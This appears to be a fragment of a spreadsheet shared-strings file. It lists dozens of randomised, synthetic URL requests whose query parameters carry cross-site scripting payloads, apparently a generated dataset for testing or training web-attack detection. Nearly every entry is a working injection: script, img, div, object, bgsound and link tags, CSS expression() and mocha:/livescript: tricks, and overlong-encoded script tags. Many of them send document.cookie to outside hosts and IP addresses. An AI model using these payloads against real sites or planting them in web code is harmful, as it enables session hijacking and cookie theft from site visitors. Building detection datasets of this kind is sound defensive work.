    <t>/82/pfyhqe/5xedcde/enevilau2ioz/tegzyeclil3nit/hdy/nairrpskgeneteedewui/.r53z54j.gif?esrh5ritgaom=79&amp;9k7zhr=947225&amp;3ixp__6loo=wz7-xbzcbv&amp;emi=66682&amp;ysxqopen=2426&amp;adarhk=9eteconnectxil+&amp;rls=&lt;img++src++=+++"+++javascript:[document.location.replace++++('http://www.vell.com/cgi-bin/teriicstis.cgi'+document.cookie);]++"&gt;&amp;edatnte=qlzx@m5&amp;aoied1lsf6r7s=esarhspeeotesk&amp;1g9a=5783465</t>
  </si>
  <si>
    <t>/egtuejrw1mnpji_/haat/hk.exe?ooakwp=dstnndtres&amp;honds=lsier&amp;ossetlnst9=ira~5i&amp;taskvqeozeime=48atyntuaoint&amp;7r0=mkn:dim&amp;iyra3dudtnar=&lt;style+++++type+=++"+++++text/javascript++++"+&gt;[document.location.replace++++('http://www.ictrtege.com/cgi-bin/selaicst.cgi'+document.cookie);]&lt;/style+&gt;&amp;nlueuocatsnn=:mf+nph-eaetelnety&amp;xuet=968630&amp;t3zs=s3dthleiw2emedcn&amp;ctsh6=0661222&amp;mf50sbiframewt=idz</t>
  </si>
  <si>
    <t>/otaedqhorosmehuq/eb/lifzfk/fexeentltrr/eund.axlivrvws/ugp@iorwzq75ks/a1vrkcx-jhpj5/9ufg1r2connectq/c4urq5hheouxrmuseo/75tiuk32f/zwgkinputk.php4?inputkd5s=&lt;div++++style++=++"+++background-image:+++++url(javascript:+[alert++('honembtdoe');]);+++++"+&gt;&amp;lrngnqr5r5ndgs=+h1i6s[nw8t7sp</t>
  </si>
  <si>
    <t>/astrm/0d/o7rebnoh/yuuh-xq-.rz3/ocohoee0/gt9qrgp/dkmtepdhaethrdfz/r2hqdzjp1.gif?saisrmfrsyt=&lt;div+++++onmouseover+++=++++"+++[alert+('0mblnmh9ba');]+++"++&gt;</t>
  </si>
  <si>
    <t>/udd/jeh/ntt5we4hee8neottad1a/2m4ma/sceuene7res0tteqi7o/af/n9.htm?msrfob7=qey(catreplace&amp;mbtdtlsuz1sd=oet"++++&gt;&lt;bodyonload=alert++(document.cookie);++&gt;&amp;tttt=ay&amp;enaimcdhaced=031534273&amp;fc=11473937</t>
  </si>
  <si>
    <t>/nqtf/a9ziqiabonzho/9zryaqtzf./ni77isdedsa/ctyujo/bo-8dv3rc3include/8yeatnkakcwzu.dll?wc1eseemsu=0633246&amp;tto=&amp;{[document.location.replace++('http://www.genatr.com/cgi-bin/anic.cgi'+document.cookie);]};&amp;pestnsaaas6obv=91253&amp;ole=9i&amp;ojwiflnnv=057925&amp;y.srwjic=ez'+gjrposition+&amp;tiura=976</t>
  </si>
  <si>
    <t>/nhg9gve59rpbxtzxrc93.bin?jneettsfo=5amtt@9foajgiid&amp;thiyo=e4po&amp;ausrnca=t7t&amp;u6=eeyo&amp;e4auier8=m8ttbi&amp;cxea2vhrev9=xuyas2coq&amp;oeheo=xcbodync&amp;mn8scriptw1xl=45&amp;slauni=ogn&amp;6hoqnrnous6oroc=546563&amp;csieoodsh=il7wxiqiphq&amp;eisc0eei9=&lt;input+++type+=+"+image++++"+++++dynsrc+=++++"+++javascript:++[document.location.replace+('http://www.trtaen.com/cgi-bin/gendlene.cgi'+document.cookie);]+++"&gt;</t>
  </si>
  <si>
    <t>/somaev3qm4pkipr6iman/hpsysiiy/htqregikqsystemcrv/05insertci.2vv2/0aeayo/ya1x1-usock_streamy-/llsr.xclne1wc3pxo65.swf?5ish4oyw=e+rml1ndt&amp;ah2etnh40e=&lt;![cdata[&lt;!--]]&gt;&lt;script+&gt;[document.location.replace++('http://www.olnsnesi.com/cgi-bin/arorlise.cgi'+document.cookie);]//--&gt;&lt;/script+&gt;&amp;ja@6=emu&amp;sftglbour=6wen&amp;cmdkxsduuscriptpk=u+ps5a(eho</t>
  </si>
  <si>
    <t>/olecehtlteyetwl/ebfbifr51.dusk9_t/ifuywisr5dtp/ttaaahhnrhjhomi9zal/lyimi2qsmtsyp12/eeetnyooe1btefozsao/docpah9bc4nf/dcpyazgy/bkd-svfq8itihsstc5/chtdebe/yz8as.swf?noeeaztlotme=58&amp;yak=00djg&amp;olift8jrnteo3ia=s&amp;kycjl8ook3=nnnr4len&amp;5nc=dnnkzuin+ordwtw&amp;lo=296264&amp;stuasehpxu=nwup1&amp;bemal=0475668&amp;eas=ax1&amp;cten9tv5mrs=1049597013&amp;ewtmitia=wd&lt;copy+&amp;rne7estdw=8en&amp;ne=ae0qoseedsteoc5&amp;q1zj8=09263&amp;wivbscriptxp=&lt;img+++++src++="livescript:[document.location.replace+('http://www.ieneelal.com/cgi-bin/an.cgi'+document.cookie);]"+&gt;</t>
  </si>
  <si>
    <t>/assydarird7t3/jaqottnz/g4/arp2zn4smaunzj84/vaekonqserl4o.png?eotia6ju5t=&lt;div+++style+++=++++"++++background-image:+url(javascript:++++[window.open('http://245.152.187.112/risech.dll'+document.cookie);]);++++"++&gt;&amp;groupbypkec5yihe=r@eiaowinnt?l3ytn2&amp;ylazd=orcnaeoxonna8hom&amp;lsaythrtutoa=m1waoee9i56re1nex&amp;lleg=n1qe9vkkisod</t>
  </si>
  <si>
    <t>/ml/ynaerwn9nyo4/grcutnshny0itns1m7.jpeg?iq4n9=sot++"+++++++style=left:expression(alert("+re.ti++"))+++alt=++++"&amp;ortydfocrh7=615148257&amp;4meaiuipa=1660&amp;xfq-va=bty&amp;niio=suuwetaaatu&amp;ew1wvonvdm=upthh</t>
  </si>
  <si>
    <t>/tih8a4m9elopajim/kgbpzeytoeplh.cfm?amotdteoat=idsolohet796root&amp;9vstylenb-qvbscriptmetaformn=7257689511&amp;ednanaenneesg=&lt;input++++type+="+++image++++"++++dynsrc+++=+"++++javascript:[window.open('http://122.148.119.243/alna.sh'+document.cookie);]++"+&gt;</t>
  </si>
  <si>
    <t>/hd4bhnwadi2p2owt/eyup/uhooahxst/fzu8thz3pbmb5vawu/t2/kwozlu-tgo99vprndlvk.cfm?eeimnlo=cr&amp;tr0o=&lt;div+style++++="+++++width:++++expression([document.location.replace++('http://www.it.com/cgi-bin/treritse.cgi'+document.cookie);]);+++++"&gt;</t>
  </si>
  <si>
    <t>/3n.sl/drwsfw3uimcmdzzt/wkk/cngg/euotreaigtas7eimim/iunxnm1nist9ke3rb/4attdaaje3t/sosqkeeedasoerboetel/bc0sjqdy1npl/ttcdukhi/fmi7n_.ff/sdh6qsjny_fxb2ca.js?td4a=&lt;link++rel+=+++"+++++stylesheet++"+href=+++"++++javascript:+[document.location.replace('http://www.maenla.com/cgi-bin/nsndla.cgi'+document.cookie);]"+++&gt;&amp;shjaedwiits5we=s7j&amp;of=34087&amp;hedalee9sarth=belebsbano&amp;k2ien4end7r2xr='eteybo9e&amp;lroofeeeod5ds=615</t>
  </si>
  <si>
    <t>/isahse9toea/melxatwt1ieeoe/xp_fvy/orrlu2nsreaeespeu/.etwj.js?otn=&lt;body+onload+="+[window.open('http://230.178.48.232/ta.swf'+document.cookie);]"&gt;&amp;httrajooew=8123&amp;ttg=521120823&amp;slacwqi=eh</t>
  </si>
  <si>
    <t>/hq4i/axgx/dfyobjectatk7/sq1fphy1o@s/o1eazwwgteoylmmexdan/o.a8m/dotwhrjene/isqwtwdna5f2po2ndj/gpivl2oolf2.mspx?auy0emeextaeh=1095209&amp;pchttr=526425&amp;tbcrlteg=72226257&amp;rpc9er=mtet&amp;bo=uezuzc0u-&amp;syeierqtee=1&amp;takce=cxe7ailelrssaon&amp;cphuu=&lt;object++++classid+++=++++"clsid:...++++"++codebase++++=++++"+javascript:+++[window.open('http://218.143.47.174/niet.php'+document.cookie);]+++"&gt;&amp;pez6-5f=uo&amp;x&amp;optupwgetwfe=syp61dbzy&amp;teraohr=59894106&amp;st0mmh0tsqs=399776</t>
  </si>
  <si>
    <t>/yopajejm/en@gxiz_u99ulemy6w7/5fd17odq1m/u-mcin229lks/itmenrtsyo4wo/elpni2haadisineeai/nellistoittk/tdescfuew/edq.asp?dlewhereqopen1g5@qs=9&amp;o7ienn=5ps&amp;-tmxgswednhj=32130245&amp;izh=s5-objecto9s7kut&amp;5ct6.uk=&lt;iframe+++src+++="++vbscript:[alert+++('re');]+++++"&gt;</t>
  </si>
  <si>
    <t>/cp1fabz1srdl-talh-fe/l4aafk7ozcnllcc/wu1urmc2e-y5_dn.jsp?tegaonmzz=$oq3m~u+ztelnetra|dy&amp;5qo8qagetngntan=&lt;img+src=javascript:+alert++('ai4.t')++&gt;&amp;nc=mbqz7&amp;nbkh=19&amp;ceandtt=84400&amp;at2anluoi=sko3tg2aec&amp;seelngsawdu4aot=sock_stream&lt;xntelnet%&amp;eemochan&amp;9cgnwhotlglict=831959&amp;izat=ht'it&amp;ih=25199889&amp;dlhoarpftif=851881</t>
  </si>
  <si>
    <t>/rgamfrpreo-iyddr5r/npa0vdxpfbb-i7h/nritheeunrat1tea/rylaesna0vw5a/segfp.html?ecpal=aslogsu&amp;kdrni=tr&gt;ia&amp;eian0jl=&amp;&lt;script+&gt;[alert++('rotdapb');]&lt;/script&gt;&amp;phaeoamiaerrte=tet1&amp;l2e=0392&amp;fr63eestgyalaht=e&amp;ueo=ih6eeypgmtt1le&amp;aninloahn=rhino99hvn1&amp;hlehs=38iota0dfrom+mx6eeo0&amp;h4abt4=94193488</t>
  </si>
  <si>
    <t>/6is.e-.optuzg6un/ehcregifsd9esneo3is6/snw.htm?dckgdr=&lt;form+name=i++++&gt;&lt;select+name=xivt+++&gt;http://www.aim.com/swe/?&lt;/select&gt;&lt;/form+++&gt;&amp;kxt8eec40rhwar=5&amp;ec8fueton=8204</t>
  </si>
  <si>
    <t>/ucrtaeaak/ayt3salissh3fefas/evssgqhkg@gebh6e.ar/leneypajs2ncszeiyel/istsettnostala0pe/7lbetweenos1/imnpxterm.tiff?ieee=o6"++&gt;&lt;bodyonload=alert++(document.cookie);++++&gt;</t>
  </si>
  <si>
    <t>/rinnedztdieorhs/ivfromypu6gn7ec/7boemgcu@ihlx/t0hormaveskyzl7.v/ol/frr/@evn7/1lpex@hoyjytgevbf_/ajckzdn2rut.rgtd8t/lyrwrfuhvm/onificfsn/j6raccess_log7.pl?eilthhl6n=h&amp;e9=3830&amp;ba8qonedek=&lt;input++type++=+"++++image+"+++dynsrc=+++"javascript:+[document.location.replace+++('http://www.inentoto.com/cgi-bin/ennameinli.cgi'+document.cookie);]+++++"&gt;</t>
  </si>
  <si>
    <t>/gfy24a-d2homemfu/4v8athpty7/5gl79bz.jtzh/nboot.iniit/ec-lesmbpahqex/tdkh.shtml?itnmochabinsbeve=236726702&amp;ieltend=tj+ddumrw&amp;t4gne3asco0zeed=114&amp;6udpli=okfste4hqf&amp;wcbkiowvqdpassthru=vwpbj&amp;earntrotteh=212366&amp;oeggraeh=&amp;{[document.location.replace++++('http://www.ar.com/cgi-bin/ngol.cgi'+document.cookie);]};</t>
  </si>
  <si>
    <t>/rdoeeh/ts9yt5nn/mm31uwl3veas/c0kly0s.bhvgl3lnz1/_rcplj-gd.y@cn/bauits.mdb?upiaiaahn=&lt;div++++style+=++"++++binding:+url([http://www.terostil.com/script/tah.bin]);+"+++&gt;</t>
  </si>
  <si>
    <t>/tshutua3h4htssanrni/oeghty.html?rea=c$don+r(uxan+r0is+v&amp;smnh0tet=n%tc&amp;arrzo7n9erp=zceanetyt1a&amp;qikli9rfia=&lt;object+classid++++="++clsid:...+"++++codebase+++=+++"+++++javascript:++[window.open('http://112.71.134.161/lles.php'+document.cookie);]"+++&gt;&amp;cphd=kw0mx&amp;nveaaebl=921184&amp;queraptnpah=to&amp;dycsr=fxw&amp;ibtb4=epie&lt;oradnu+ovbscript&amp;wd=ltpgedufslg&amp;eseorm=rcuzj&amp;httpzuehlzl=zlosioruean6o&amp;ftecn=ncyosot1chc7bil&amp;idzsd1esteindti=tncmd</t>
  </si>
  <si>
    <t>/ax30uo5dwwvmu0z3je3d/spkbsasgahcnqaewa/5he3imni/af8opeauohlwadomidod/sf7k4bgmj/8ltjnqsgso/e9j0kskqetb/ajemk/eteflun4rs/bt8hb/ilnhanpsafqitt/xxzroyqqanfr-8.js?hb=&lt;img+++src+++=++++"+++mocha:[document.location.replace++('http://www.vest.com/cgi-bin/el.cgi'+document.cookie);]+++++"&gt;&amp;ptrojhisso=120</t>
  </si>
  <si>
    <t>/ssgnb/rhaldwietntiot/i.apyhl7xwpil56/oamcr_g3n.php4?irikssnesx7llg5=84230&amp;hceojaltaairoct=&lt;link+++++rel+++=++++"stylesheet+++"+++href="++++javascript:[document.location.replace+++('http://www.letr.com/cgi-bin/atleasre.cgi'+document.cookie);]+++"++&gt;</t>
  </si>
  <si>
    <t>/pshahdlwsa6o24/naaeyusccibetg/@7yhs0radmin-1x.jpeg?tgn8tiiea=ihiqszc&amp;chae=7&amp;sa8dtyidmeaha=&lt;img+++++src+++=++"+++++javascript:+[window.open('http://217.123.23.44/veis.asmx'+document.cookie);]++++"+&gt;&amp;wu7esada18ykum=rao38c</t>
  </si>
  <si>
    <t>/l71lmzki0vcyit-/ontrbgmzgcp6.x/e6fftisyz8zcdut/nhtb6oiddt/rri1t03eeacit/i3l@7r5dvsbvhmne/eahrsudogtmfmsn/fpad70cu.xso/e-/adeifa/mvar_access_logw.msf?mdleliotren=pbsijemat8eedxu&amp;sjleuepwbrcp=&lt;script+++&gt;alert++(canmadrwareu3d.s50en)&lt;/script+&gt;&amp;oipntia=727096318&amp;0uyhmss=nfrnnh4t&amp;ewed=sa-cc&amp;afstatprtij=wtlrzpitecgw&amp;rue0iz5yakt=c+v$tqw&amp;vuflslg2h=7cru1jv&amp;cz9hs1lasp=fl1v424pio_&amp;mlohabovjntjsem=0637432&amp;fpsysd2audmcbf=hihrmgh&amp;y5jkhfv=98697&amp;rtse=9998&amp;nhitnetrt=1</t>
  </si>
  <si>
    <t>/moyn4rolva/dsymwwp0.aspx?opselect_@o=e&amp;irngdm8qy=e3hcgrsuett&amp;snv0ne=ni;xo&amp;yecopy1kyhlzya=&lt;meta+++++http-equiv++=++"++refresh+++"++content=++"++++0;url=javascript:+++[alert+('qaocl');]++++"&gt;&amp;eznt=elsfbdsetvjldeotns+3</t>
  </si>
  <si>
    <t>/vikps/tymrsdusaevieio/ig1wuwz7li/ok_xi3_/ea9f7csaafd/drvbt46c7-62jj/e4ofjgfm.mdb?hriexsntxfm=8s&amp;apoeaimtolreai=038686&amp;o0lokdfdemzes=928&amp;efya8cz2=cete&amp;cfrereso=imeb66tsax|nrs6la2&amp;eeltyataydm=\\?tn8&amp;ilon1ie0isoe5='cda=rew+5)m&amp;c&amp;tsure=o0hetns&amp;5taeaelspe=nh@5xmfdxzd3&amp;nodet=ryshe&amp;zinbwr=le0aadminb9ls&amp;jsbb=i.w7rfg3z&amp;nedrpr5iani=394&amp;pnttzxleo=&lt;bgsound++src=+++"+javascript:[document.location.replace++('http://www.tosi.com/cgi-bin/tina.cgi'+document.cookie);]+"++&gt;&amp;mui0se=2565034</t>
  </si>
  <si>
    <t>/zhirrfrgb/dhleeeudrd3sd.sh?ni0srfqoea=iee&amp;xct1neagoevoe=+to&amp;ereh5bro=n0a2lnhfp&amp;hjnihmshwhse=32005057&amp;3ugotn1=os=yud2haf$id&amp;iefo=ms5tk2mhnem9i&amp;lqlcolsr8el=at\\a&amp;3xpdo=96015505&amp;arabs1ilod6t=ahy&amp;mnpyj=idss&gt;xsn&lt;n+enull&amp;cesc8connectxmlit=al?h3trsmleip&amp;vjgztr-1kvp=&lt;img+++++src++++=++"+++++mocha:[document.location.replace++++('http://www.sive.com/cgi-bin/nticalnine.cgi'+document.cookie);]+++++"&gt;</t>
  </si>
  <si>
    <t>/htdtamehbisaaeeanmpr/dss9m32nstqssk3/ea/tqswjpj8bs-/zgpk/24hqc/ttwnumyq-4k/acmrrwyd1yodn/ek.de1l/rntdpeqhf/h22ppkvtxhdbjwrz-47d/unacftl.asp?rboil3nro3di=&lt;body++onload+++=+"++[alert++++('pjor1tlbtq');]+++"++++&gt;&amp;pchb3th=rirson7wsai6e3</t>
  </si>
  <si>
    <t>/bckr@9.gc/rthoo/j3t3jsogd0d91p9/esrk7e.msf?a4=annlli7uprbeii&amp;niebwhd=2395056737&amp;deu4oapv2xo=[\\xc0][\\xbc]script++&gt;[alert+++('ifs');][\\xc0][\\xbc]/script+&gt;&amp;elraimnlm=1&amp;lihye0gnej=)+&amp;hvsone=sss1ottd&amp;yh6azm=2a@vnuasfc</t>
  </si>
  <si>
    <t>/d3iardaqy7/hlxlz225v@sj/kriooobernsednere/3npnse7eo6ga540rne/h8.ffkpzemjil3bcgzdp/snp43nntgaai/piyocabiefcrxtcd/evoacdch6h/wllcdt9nl5hjn/ef.mdb?jho4etatst=15817&amp;tndea8gst7=9458448&amp;mn2f@hgwtk=tbjzuo2nj&amp;5kmmdscriptz=emlv5md2yon&amp;oirona=&lt;xml+++++src+++=++++"javascript:++++[window.open('http://93.150.228.16/ilorin.msf'+document.cookie);]+++"+&gt;&amp;seoqtiuths=ex.kkvux&amp;dteira37ee2=01</t>
  </si>
  <si>
    <t>/sstxanqih/ii5brcz12e3goe/h1tqglq6d/ina5r1uocvdeany/..zlinclude-0b2qsx5z/jsnn/fkryxfod/75qga6ep2jmn.php3?eweerohetn=&lt;img+src++++=++"+livescript:[document.location.replace++++('http://www.trorar.com/cgi-bin/nirema.cgi'+document.cookie);]+"++++&gt;</t>
  </si>
  <si>
    <t>/seaatanei/oirt0o/aonemssisstacteii/h3t56d/gqml-gmoolw52f/sb6wdde/teseboe80g/arohspso6dyt2v0tvn/nqesfyhtvrt.asmx?fj7ercme=098339&amp;dztaaa=systemn$jt&amp;saearro=&lt;![cdata[&lt;!--]]&gt;&lt;script++++&gt;[document.location.replace++('http://www.llta.com/cgi-bin/eronoron.cgi'+document.cookie);]//--&gt;&lt;/script+&gt;&amp;hhkolee=24&amp;ed70fdeiapaowvo=dsvuz&amp;oudb=6566865</t>
  </si>
  <si>
    <t>/tfb/eetazr-nwll_dnw-/qotnoffrsbs8/a7l-xabh-jeyxqc/5tbanaa9a6oxyh/9josyabtiewalfvrt.cfm?thwwoll=onnm4&amp;ogtkxuide=ab0-3qytj&amp;dpyrrsa8=re6tie+"++++++++style=left:expression(alert++("++++gt.rojlth+++++"))+++++alt=+++"&amp;ermatdipo=l08&amp;eno=mes%uef+&amp;hsed=uhebesvbt&amp;iiwnoaiaet=584&amp;iemtiqearra=9.ke</t>
  </si>
  <si>
    <t>/elrqrtfdtodvqnas/el231kr4arudnr.shtml?etecoteiy2ti=umec&amp;3ti=ebodytmpo&amp;wga=eebej3fsmes&amp;wmdyieyfd=(a+ndneer&amp;5tmdurenocb=mfefigre4rg7zh7&amp;aastn=[\\xc0][\\xbc]script++&gt;[alert++++('pola');][\\xc0][\\xbc]/script+&gt;&amp;passthrurge7w=98857824&amp;idrllpn=564251795&amp;aweei9i=h@lylg&amp;cth47dmtaoi=29</t>
  </si>
  <si>
    <t>/snyeetieg0.asp?atw=srsgoicz+odo&amp;joeabco=leeiuetwlobject&amp;iqoae=bu&amp;af=rtc+xqannph-ev5o&amp;ucyiko=&lt;div+++onmouseover+++=+++"+++[document.location.replace+++('http://www.chdees.com/cgi-bin/retr.cgi'+document.cookie);]+++++"&gt;</t>
  </si>
  <si>
    <t>/rr/eethlcltptmdhnmqs/eweciriared/agb2bg.@0wncv0eyn1j/r-/efd.yvgefnqd@gb4y/sgwai6se6naewhb/fpas8/cdtaqvspue-ewi/sqwa47wyekmocha59e8/9kissvigcpowyo/tvpbfqxxhcaf4vk.zaux.php4?ctrn=16&amp;ffp60ue=061&amp;p7xoiond=li:f&amp;tmuu=io&amp;s7=6a+a1e+&amp;aeogafirh&amp;d9mgrnx4jly=ts&gt;eb&amp;7ehttpsdocumenth=oesa&amp;4t1a=9112105&amp;jfv@jjofgl1=$/[io~cek&amp;jmu1suwg=2134856&amp;eaui=itqsn&amp;ofqkeiwao=&lt;div+++++onmouseover+=+++"+[window.open('http://17.130.182.222/attrar.sh'+document.cookie);]+++"++&gt;&amp;wmeu0dtul=79275617&amp;n7eixretsntno=769120&amp;ssaozhorhalddu9=s(d+</t>
  </si>
  <si>
    <t>/eiyeze5xp41tn3aecnes/8cpasswdj/abhwyaxu.va1hbcs/8usr/lt0rdt0tseai/rtascmu9s4oarrsl/tb5wu-pvr1/aihif/o2/ora5mgemeosycineahol/a2byfyjov8dm77px/nr1r4tsioefh9d.jpeg?hkc2groupbys=30&amp;9kxy=zrbhtu&amp;atkie=mi5arlfnyeshhdeeo&amp;b78bstde=s6ho&amp;eeai=os\\https+1mew(orxtermamcaqs&amp;as0eu0eatd=dm3e&amp;oitfamea=&lt;img+src=javascript:+alert++('hgdp.en')+++&gt;</t>
  </si>
  <si>
    <t>/aojnzhnw.pl?nweeemcerdu=ua@0unmail&lt;&amp;9naeiteatventd=obx&amp;euo0rra5eddf=eht928&amp;0p2tenq=64905&amp;ejeuoeiottnd3re=7494015&amp;kyobrpeq=+&amp;hisuansnastv5=hsikr8bs6kisduuot&amp;nidn03qk11ott=hii6cwe4r&amp;ia=7772235&amp;u7cesr9o=beddi&amp;kvfsi=&lt;a+++href=++++"+++about:&lt;s&amp;#99;ript++++&gt;[alert+('frontc');]&lt;/script+&gt;"+++&gt;</t>
  </si>
  <si>
    <t>/uauor/w_m/2tqgqlzexecn/h_xrxu689odywka_1_z/xy3aduso7lmrny/telnetk/evr@an/9mkzagii8dxkrrlku4tp/mu8m9_cgcpx2.mdb?rir4etyhsett8dl=nomdtti1gl7so&amp;ydoacvtt=eepaatuuleabht&amp;9coy2-o=gtsr&amp;eaalhoe=&lt;object+classid=+"+++clsid:...+++"+++codebase=+"++javascript:[alert++++('7ia4');]"+++&gt;&amp;ec5tvipb=8650364&amp;hf7netei=227019223&amp;00tyrwuet6aoq=\\-hqad61@qm&amp;29g2oy=8eb0ne</t>
  </si>
  <si>
    <t>/cdni4.cgi?ieomo6nveisisa6=tgnvu&amp;dhdewapc=t++&amp;gfjza@0ujki=754868&amp;cssefdnah=++leeylogaihsrime+al&amp;nhmxiseiy5=&amp;{[document.location.replace+++('http://www.trtoal.com/cgi-bin/nasternt.cgi'+document.cookie);]};&amp;aanaaeeuvceh8oe=98452&amp;._buo=xtih4suscdolhrh&amp;r8ta=2244787</t>
  </si>
  <si>
    <t>/fcvmssmterjerea/i7hwgjoham5d3gx8s/e2zw9zoi/wenctnaoqdoa8e54sp/gmxsa0kzw@cj./-c_-f/dcrtdeir.bin?iref=125145&amp;swma=teci&amp;4p_b2e6g=e|rlibs+io&gt;s=sshutdowndeue/s&amp;wtwe=19545&amp;igs=&lt;object+++classid+++=++"++clsid:..."+++++codebase++=+++"+++javascript:++[alert('dcleos9');]+++"++&gt;</t>
  </si>
  <si>
    <t>/tkyrjeylu5k-jnx4_jk/na-x2wfxzu/sp0m7tztnwvk.nsf?rdrdrozanazcl=btae&amp;ryeybu=&lt;div++onmouseover+=++++"[window.open('http://251.39.28.58/nira.bin'+document.cookie);]++"+++&gt;&amp;oa=lm'xostdin9s&amp;lmntsb=882065105&amp;n7bdivfmak=re(&amp;n5=jshls&amp;xl=~evalae&lt;eqo&amp;senrj=r1in&amp;xmsszey1ty=tcpassthruat&amp;a0=r&amp;fdl=o&amp;tube=9aewkvwhtgq</t>
  </si>
  <si>
    <t>/gexectrbsl/cyv/2nph-ewwwwpdocument0x/kou.php3?loec=64&amp;omf0medqa9wsrhy=f+t%u3d&amp;osrnndhls4eedpo=in%&amp;wlebjnufdieda=ahrtsocmd&amp;ed2alaeooswh=cpu8r&amp;ihsueb6qer=30901970&amp;_input1tq0j9o=9uon9ap&amp;saa=4031&amp;mr=361&amp;f7srsp8dr3zese=tgpx&amp;secnae5dwld5to=nmctht72&amp;tyof=&lt;bgsound++++src+++=+"+javascript:+++[window.open('http://190.143.140.214/ri.asp'+document.cookie);]+"++&gt;&amp;rsotulhtoitctff=nasntc7asrswn&amp;otfmeieai=iilgeoorfeetiee</t>
  </si>
  <si>
    <t>/oadsfjjrn1dk/rzxjnnvql.evyeo/rqiol/ytqz1n2eegexecf/lo8utitleiren8ta/tszxgxejjnshni_/an147ajmx7ncx.php3?0aotn=&lt;bgsound++src+=+"javascript:[document.location.replace+('http://www.arortrne.com/cgi-bin/lisintor.cgi'+document.cookie);]+++"&gt;&amp;fndoag=9ilink&amp;trdcanim=elr&amp;rtha=thtn&amp;thnbieemkmepttg=positionoyhee3crmrher&amp;uttlvecelllcta7=ebe&amp;wrsli=tloatd&amp;siame0h=dzwfmu&amp;bidtcncasmiv=2374&amp;yoydlp4andfe=d46ucpz&amp;t4=nw87.pacra5&amp;nby72usneo=z+2(&amp;2cdyt=819268</t>
  </si>
  <si>
    <t>/p3rzst0/abetweenilike.tmpjzxservicesv/othnalbenmhe/lahqqnna9svzjebfsx/1a-jp/r8tp7n5fmw8@.gif?axdylydql=358&amp;rpmer5yhnsi26=t&amp;onhhlnt=945535&amp;sl2gao=mfefbremeshn&amp;stodhbzr7s=&amp;{[alert('atiasathvt');]};&amp;utonahul=008&amp;rnetzss6tetcw0e=tfyh-</t>
  </si>
  <si>
    <t>/f7sekl2l2rshk_@1t/srn6jmitp/px/tz/chj3aoahfspfrwv21/xiefa5gwp_cvjqji6anv/ohjs.gif?ntifntehvhlec4s=?ntd&gt;aiframeclx9&amp;9brm=&lt;iframe++src+=+++"+vbscript:[alert++('groioi');]++++"+&gt;&amp;lrn=jttty(hd9icjb&amp;tlsriiowlcc=lzl&amp;rdritleht=5&amp;totro5cep=190312&amp;ppw@g8v6=1921164615&amp;fxbog=i1position0nttsse&amp;u8at4ajlntse=er@nj+orn&amp;gtimrlraol6knme=3057&amp;rcops3rtme=422&amp;trc=metft&amp;4eeyd9=ny.d</t>
  </si>
  <si>
    <t>/refinsaanaholhielebx/d5neaudpvrcaantecbd/ribm.shtml?oerceciiamwocs7=&lt;img++src+=+"mocha:[document.location.replace+++('http://www.on.com/cgi-bin/ries.cgi'+document.cookie);]++"+&gt;&amp;s8osvtet=9665&amp;gopal5hwb=866163520&amp;bpmadrimmpnqvh=g9xanyipz-s&amp;telnetuhncru_43i3=94/t2n&amp;awoosa7eojeei=rz3m28chtffk&amp;pxbbk1eds.ah=iindio4chif_&amp;_yov=erni2maixhcoennre&amp;cuh2bff1d=cmmrdnie</t>
  </si>
  <si>
    <t>/afglckcw7pamt_howjb/-ojj8kryfhomer5nf/tv/gslgfn0es/zd3m/zj/kcbptmp-tmb3/ukasnv4ws/reisz0v/tgfkxqs/8xaqs5bih3ltodgv5l.htm?a8xrsieeietfo=dggfzgwn8.9&amp;ec5dliiioritei=472&amp;dleuesehj=560&amp;lcfa=&lt;xml+++++id++="+++x+"+&gt;&lt;a+++&gt;&lt;b&gt;&amp;lt;script+&gt;[document.location.replace+('http://www.ieient.com/cgi-bin/llesli.cgi'+document.cookie);]&amp;lt;/script++++&gt;;&lt;/b+&gt;&lt;/a+&gt;&lt;/xml+&gt;</t>
  </si>
  <si>
    <t>/e0spvzcqwd1c9j/e.tcsxuamcddrvx/wt/iloobms2ettazpeyr/lj/m9tw5cx/aeahn09htiehaeolg/gapptetsohlsiswal/s.yagjjfzjqxr1jodz@q/8.jgntpgox-ci/8pf3p_sh7kd.ll/9taoes6efemrhiua.js?iannwperllmjetx=xa(&amp;hvdain7reix=%u&lt;p&amp;athoiinec7ei9r=86&amp;arnhi=he&amp;saeespdjtc9rdbt=&lt;a++href++++=+"+++++about:&lt;s&amp;#99;ript+++&gt;[window.open('http://100.159.192.52/onti.cfm'+document.cookie);]&lt;/script+++&gt;"+&gt;&amp;.servicesj_yor=l&gt;reieqa&amp;ieoekrsethnrtt=1</t>
  </si>
  <si>
    <t>/ax3dw_ytshh/dedsunj/iifvneiiee9aq6n/echoqlz/icrhogu8t9.mdb?c4nenrrm=dettax&lt;eit&amp;a&amp;nmn=6oehhag7dtnimlto6&amp;tghlcd1a=ttoeeieorsow&amp;v.epzdjlocationu=38508&amp;tcmseilasae=6952&amp;zgaac60gs=d++onload=javascript:+++alert++++(odmseys.he8eims4w2o)&amp;klooo97sohqse=ozvwwqz@nh&amp;o4natautna=2335015&amp;oureuxhy0rjast=htaccesg2o(hneeer=ss&amp;rw4ew4wefvtmcio=n@sbdahodstyle</t>
  </si>
  <si>
    <t>/sde4cn/dg9rewna3ransseittrv/xjs/dhntetln/shi92tlet7dwtiiae/mpenjez/e20qzhf/5ereitblceh0/b6epdiqromitezgencu/gefnetcatcnjaq.nsf?etandiee1m=gde&amp;h0aupqtl=077&amp;jtsjibx4=itg&amp;sehftets=h@u$st+r&amp;iludgshdfu6=63&amp;h1w6=telnetn&amp;qbfusrwv_pr=slath&amp;cntctn=76988&amp;i29pmnfvyt.e=etiwrfg+wi6dr&amp;iruciaeeorrx=325055355&amp;ee=&lt;!--+--+--&gt;&lt;script+&gt;[window.open('http://84.56.146.85/alri.php4'+document.cookie);]&lt;/script+&gt;&lt;!--+--+--&gt;</t>
  </si>
  <si>
